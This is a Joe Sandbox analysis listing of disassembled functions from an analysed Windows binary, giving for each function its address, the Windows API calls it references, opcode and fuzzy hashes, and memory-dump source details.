Opcode ID: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
Instruction ID: 0b7a1e224bf35d8a7f398d5ecd0e6b4f17d5088d86843c90ea5afdf2fb671657
Opcode Fuzzy Hash: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
Instruction Fuzzy Hash: 57F03C32542A02BBD7415FA4EE8CBE6BF39FF12702F402025F202A18A0CB749469DF90

Function 00591C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00591DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00591DE1
WSAGetLastError.WSOCK32 ref: 00591DF2
htons.WSOCK32(?,?,?,?,?), ref: 00591EDB
inet_ntoa.WSOCK32(?), ref: 00591E8C

Part of subcall function 005739E8: _strlen.LIBCMT ref: 005739F2

Part of subcall function 00593224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0058EC0C), ref: 00593240

_strlen.LIBCMT ref: 00591F35

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: e16692b43dd7570cc3178c0393ca4c2c315be9796153ffbaab0d74ec2cd6b0bf
Instruction ID: f6c090ac83c268da4f1ecb23090663e86ae2e228c682cf52d9d3a2e99914afd1
Opcode Fuzzy Hash: e16692b43dd7570cc3178c0393ca4c2c315be9796153ffbaab0d74ec2cd6b0bf
Instruction Fuzzy Hash: 19B1ED31204712AFDB24DF24C889E6A7FA5BF85318F54894CF4564B2E2DB31ED82CB91

Function 005401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 005400BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005400D6
__allrem.LIBCMT ref: 005400ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054010B
__allrem.LIBCMT ref: 00540122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00540140

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 8e23473207f57ba74eec83dc3c1ed4eca54db54e1dc9b9ce217cb2f8d7501e95
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: B081F871A007069BE724AE39CC49BAB7FE9BF91328F24553AF951D76C1E770D9008B50

Function 005461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005382D9,005382D9,?,?,?,0054644F,00000001,00000001,8BE85006), ref: 00546258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0054644F,00000001,00000001,8BE85006,?,?,?), ref: 005462DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005463D8
__freea.LIBCMT ref: 005463E5

Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852

__freea.LIBCMT ref: 005463EE
__freea.LIBCMT ref: 00546413

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
Instruction ID: 3fbf251d5f23bc9fb632ed8b9185025db5f5fafee3f0279a8ec4fe322b68717f
Opcode Fuzzy Hash: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
Instruction Fuzzy Hash: 5751DE72600256ABEB258E64DC85FEF7FA9FB86718F144A29F805D7190DB34DC40C6A1

Function 0059BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BD25
RegCloseKey.ADVAPI32(00000000), ref: 0059BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0059BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0059BDF3
RegCloseKey.ADVAPI32(?), ref: 0059BDFF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 884fa420b0a8ffb9f1359db9e48005a25e23c0390b16d999c2e592ae6b24b825
Instruction ID: 2a9319274df48716c95288e4857821f2f203e22104ad1a171ec66022f79a0c6c
Opcode Fuzzy Hash: 884fa420b0a8ffb9f1359db9e48005a25e23c0390b16d999c2e592ae6b24b825
Instruction Fuzzy Hash: 7B819D30108242AFE714DF24D995E6ABFE9FF85308F14895CF4594B2A2DB31ED45CB92

Function 0056F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0056F7B9
SysAllocString.OLEAUT32(00000001), ref: 0056F860
VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F889
VariantClear.OLEAUT32(0056FA64), ref: 0056F8AD
VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F8B1
VariantClear.OLEAUT32(?), ref: 0056F8BB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: f817c579a5261397b4948ee04a2e17cf52ee271edbbce01a0ff72a991b5af2cd
Instruction ID: bd3130b51eb21b362942704d5d13f4857b70a6ea9e97e5f70fdf2f0b091cf2e1
Opcode Fuzzy Hash: f817c579a5261397b4948ee04a2e17cf52ee271edbbce01a0ff72a991b5af2cd
Instruction Fuzzy Hash: AA51C831E00311BBDF20AB65F899B69BFA9FF95310F245866E905DF291DB708C40C766

Function 0058910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 005894E5
_wcslen.LIBCMT ref: 00589506
_wcslen.LIBCMT ref: 0058952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00589585

Strings

X, xrefs: 00589412

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 19390ebe71eea81c73e46538e88ebcf5df4d2ecad51e22a37f0245922fd46396
Instruction ID: 11df7cf4072da922e408185763d5ec414add65fba783ca5403043dd5de1535b1
Opcode Fuzzy Hash: 19390ebe71eea81c73e46538e88ebcf5df4d2ecad51e22a37f0245922fd46396
Instruction Fuzzy Hash: 51E1B5315043019FD714EF24C885AAEBBE4BFC5314F18896DF8999B2A2DB31ED45CB92

Function 0052920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

BeginPaint.USER32(?,?,?), ref: 00529241
GetWindowRect.USER32(?,?), ref: 005292A5
ScreenToClient.USER32(?,?), ref: 005292C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005292D3
EndPaint.USER32(?,?,?,?,?), ref: 00529321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005671EA

Part of subcall function 00529339: BeginPath.GDI32(00000000), ref: 00529357

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
Instruction ID: 027379cd50156cfc62f615645239b1b77b58bb2120b6ee5cc23bfec4bf28e176
Opcode Fuzzy Hash: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
Instruction Fuzzy Hash: C1419F31104255AFD710DF24D884FBA7FA8FFAA724F140629F994CB2E2C7309849EB61

Function 005807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0058080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00580847
EnterCriticalSection.KERNEL32(?), ref: 00580863
LeaveCriticalSection.KERNEL32(?), ref: 005808DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005808F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00580921

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 07d0c3756413b901c071befae69357807687bdf318a6bf728e3e3d42e8ce51d8
Instruction ID: 4500ba0523c5062cea205dafcd198b214d5d59c943d0a2c7110aba8eaec8f3da
Opcode Fuzzy Hash: 07d0c3756413b901c071befae69357807687bdf318a6bf728e3e3d42e8ce51d8
Instruction Fuzzy Hash: 34415B71A00205EBDF55AF54EC85AAA7B78FF45310F1440B9ED00AA297DB30DE69DBA0

Function 005A81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0056F3AB,00000000,?,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 005A824C
EnableWindow.USER32(00000000,00000000), ref: 005A8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 005A82D1
ShowWindow.USER32(00000000,00000004), ref: 005A82E5
EnableWindow.USER32(00000000,00000001), ref: 005A830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005A832F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
Instruction ID: 1e32dd9f8b9f24350eac1461971b1f38191ecfe6c4d8894e7d7143417267ca4d
Opcode Fuzzy Hash: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
Instruction Fuzzy Hash: BC419F34601A44AFDF25CF14DC99BB87FE0BF5BB14F1851A9E6488F2A2CB31A845DB50

Function 00574C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00574C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00574CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00574CEA
_wcslen.LIBCMT ref: 00574D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00574D10
_wcsstr.LIBVCRUNTIME ref: 00574D1A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 2e4df6f285bfb62b9a26b2e4f3074fbfab9d1a377dd5210a4ed884099a2ceef4
Instruction ID: ea13f0270ee074d96add9a742b390796300102f201a5ab985024bad39e9a3012
Opcode Fuzzy Hash: 2e4df6f285bfb62b9a26b2e4f3074fbfab9d1a377dd5210a4ed884099a2ceef4
Instruction Fuzzy Hash: BD21DA31204111BBEB269B39BC49E7B7FACEF46750F108079F809CE191EB61DC00ABA0

Function 0058581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2

_wcslen.LIBCMT ref: 0058587B
CoInitialize.OLE32(00000000), ref: 00585995
CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 005859AE
CoUninitialize.OLE32 ref: 005859CC

Strings

.lnk, xrefs: 00585876, 005858C1, 00585985

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
Instruction ID: df1f498cf2d8dc26ba8d104b54e7ceb7076030961fc1a982c014677c50aa6180
Opcode Fuzzy Hash: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
Instruction Fuzzy Hash: 7DD155716046029FC714EF24C484A6ABBF6FF89715F14485DF88AAB361EB31EC45CB92

Function 0057175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
Part of subcall function 00570FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
Part of subcall function 00570FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
Part of subcall function 00570FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002

GetLengthSid.ADVAPI32(?,00000000,00571335), ref: 005717AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005717BA
HeapAlloc.KERNEL32(00000000), ref: 005717C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 005717DA
GetProcessHeap.KERNEL32(00000000,00000000,00571335), ref: 005717EE
HeapFree.KERNEL32(00000000), ref: 005717F5

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 4da0a6e0e45fd49973f8ec42e1f887c681cf1f5190ee6c258dc5d49234eb325e
Instruction ID: a306c3febc59018670b8c3e746feebefba4651decdf4236d2cc456a286eb8a99
Opcode Fuzzy Hash: 4da0a6e0e45fd49973f8ec42e1f887c681cf1f5190ee6c258dc5d49234eb325e
Instruction Fuzzy Hash: 7111BE71600605FFDB189FA8EC49BAE7FA9FB42355F108018F44597210C735A948EB64

Function 005714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005714FF
OpenProcessToken.ADVAPI32(00000000), ref: 00571506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00571515
CloseHandle.KERNEL32(00000004), ref: 00571520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0057154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00571563

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0c0604779c7198e041c0ac53323d7efa6ea176cf0264872020bb5f81644529f7
Instruction ID: 3de88d6edb35001512216c03d84204cd82d6485c888df2724c75c87a67a78cfc
Opcode Fuzzy Hash: 0c0604779c7198e041c0ac53323d7efa6ea176cf0264872020bb5f81644529f7
Instruction Fuzzy Hash: FF112972500209ABDF118F98ED49FDE7FAAFF49744F048059FA09A2160C3758E68EB64

Function 00533382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00533379,00532FE5), ref: 00533390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0053339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005333B7
SetLastError.KERNEL32(00000000,?,00533379,00532FE5), ref: 00533409

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0814a7d5790b763d352e923930218a73e478aee21eca2a61569909e4f3576635
Instruction ID: f693e8de9a1fddd44ff4ea10a9246f772a41f29b1619651dd54edb8fdbc2cff6
Opcode Fuzzy Hash: 0814a7d5790b763d352e923930218a73e478aee21eca2a61569909e4f3576635
Instruction Fuzzy Hash: 4201243320A313BEAB2527757C8E66B6F94FB65379F20862BF411812F0EF115D09E544

Function 00542D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00545686,00553CD6,?,00000000,?,00545B6A,?,?,?,?,?,0053E6D1,?,005D8A48), ref: 00542D78
_free.LIBCMT ref: 00542DAB
_free.LIBCMT ref: 00542DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DEC
_abort.LIBCMT ref: 00542DF2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 62cfb83b7b5bef5b7d563da29e61da4aeff2f3a90bfebd958c39198c6cdece49
Instruction ID: f5cbab5f9bf341c041b5f3053ea48a15feefdc3825c3808692b893db0908a8b7
Opcode Fuzzy Hash: 62cfb83b7b5bef5b7d563da29e61da4aeff2f3a90bfebd958c39198c6cdece49
Instruction Fuzzy Hash: 02F0F935905A2227C72223356C0EBDA3E65BFD276CF640416F424921D1DE7088065120

Function 005A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005A8A4E
LineTo.GDI32(?,00000003,00000000), ref: 005A8A62
